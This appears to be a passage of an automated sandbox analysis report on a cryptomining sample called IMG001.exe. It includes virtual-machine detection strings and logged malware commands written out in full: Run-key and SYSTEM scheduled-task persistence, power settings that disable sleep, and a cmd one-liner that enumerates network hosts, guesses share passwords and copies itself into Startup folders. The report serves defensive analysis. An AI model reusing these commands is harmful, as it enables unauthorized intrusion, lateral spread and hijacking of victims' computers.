Source: IMG001.exe, 00000006.00000003.248338323.0000000000BB7000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: IMG001.exe, 00000006.00000003.255178040.0000000000BB7000.00000004.00000001.sdmp	Binary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
Source: IMG001.exe, 00000006.00000002.513988664.0000000000B4A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWhq]H
Source: NsCpuCNMiner64.exe.6.dr	Binary or memory string: XhgfS
Source: IMG001.exe, 00000006.00000003.248320987.0000000000BA2000.00000004.00000001.sdmp	Binary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g
Source: IMG001.exe, 00000006.00000002.513959006.0000000000B07000.00000004.00000020.sdmp	Binary or memory string: 0000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: IMG001.exe, 00000006.00000003.264312248.0000000003159000.00000004.00000001.sdmp, tftp.exe, 0000000A.00000002.253891568.000000000099F000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: IMG001.exe, 00000006.00000003.255178040.0000000000BB7000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!!
Source: IMG001.exe, 00000006.00000003.265440061.0000000000BB7000.00000004.00000001.sdmp	Binary or memory string: End CCI clsid:{9E175B6D-F52A-11D8-B9A5-505054503030} context:23 RSN: hr:0x80070422bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[[
Source: IMG001.exe, 00000006.00000003.245935583.0000000000B69000.00000004.00000001.sdmp	Binary or memory string: Windows6700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b})&
Source: IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWH
Source: IMG001.exe, 00000006.00000003.251095894.0000000000BB7000.00000004.00000001.sdmp	Binary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}**
Source: IMG001.exe, 00000006.00000003.262169633.0000000000B79000.00000004.00000001.sdmp	Binary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}dd
Source: tftp.exe, 0000000A.00000002.253786501.0000000000938000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWP8
Source: IMG001.exe, 00000006.00000002.513959006.0000000000B07000.00000004.00000020.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y4
Source: IMG001.exe, 00000006.00000003.248320987.0000000000BA2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: IMG001.exe, 00000006.00000003.252931532.0000000000BB7000.00000004.00000001.sdmp	Binary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Min

Source: C:\Users\user\Desktop\IMG001.exe	API call chain: ExitProcess graph end node	graph_0-1335
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	API call chain: ExitProcess graph end node	graph_5-9090
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	API call chain: ExitProcess graph end node	graph_5-11578
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	API call chain: ExitProcess graph end node	graph_6-2487
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	API call chain: ExitProcess graph end node	graph_6-2322
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	API call chain: ExitProcess graph end node	graph_26-1334

Source: C:\Users\user\Desktop\IMG001.exe

Code function: 0_2_00405D12 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405D12

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\tftp.exe

Code function: 5_2_00401000 SetUnhandledExceptionFilter,__getmainargs,_iob,_setmode,_setmode,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,signal,signal,signal,signal,signal,signal,

5_2_00401000

Source: C:\Users\user\Desktop\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process created: C:\Users\user\AppData\Local\Temp\tftp.exe 'C:\Users\user\AppData\Local\Temp\tftp.exe'	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process created: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Users\user\AppData\Local\Temp\tftp.exe 'C:\Users\user\AppData\Local\Temp\tftp.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @net view\|find /i '\\' \|\| @arp -a\|find /i ' 1'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net view
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /i '\\'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /i ' 1'

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p 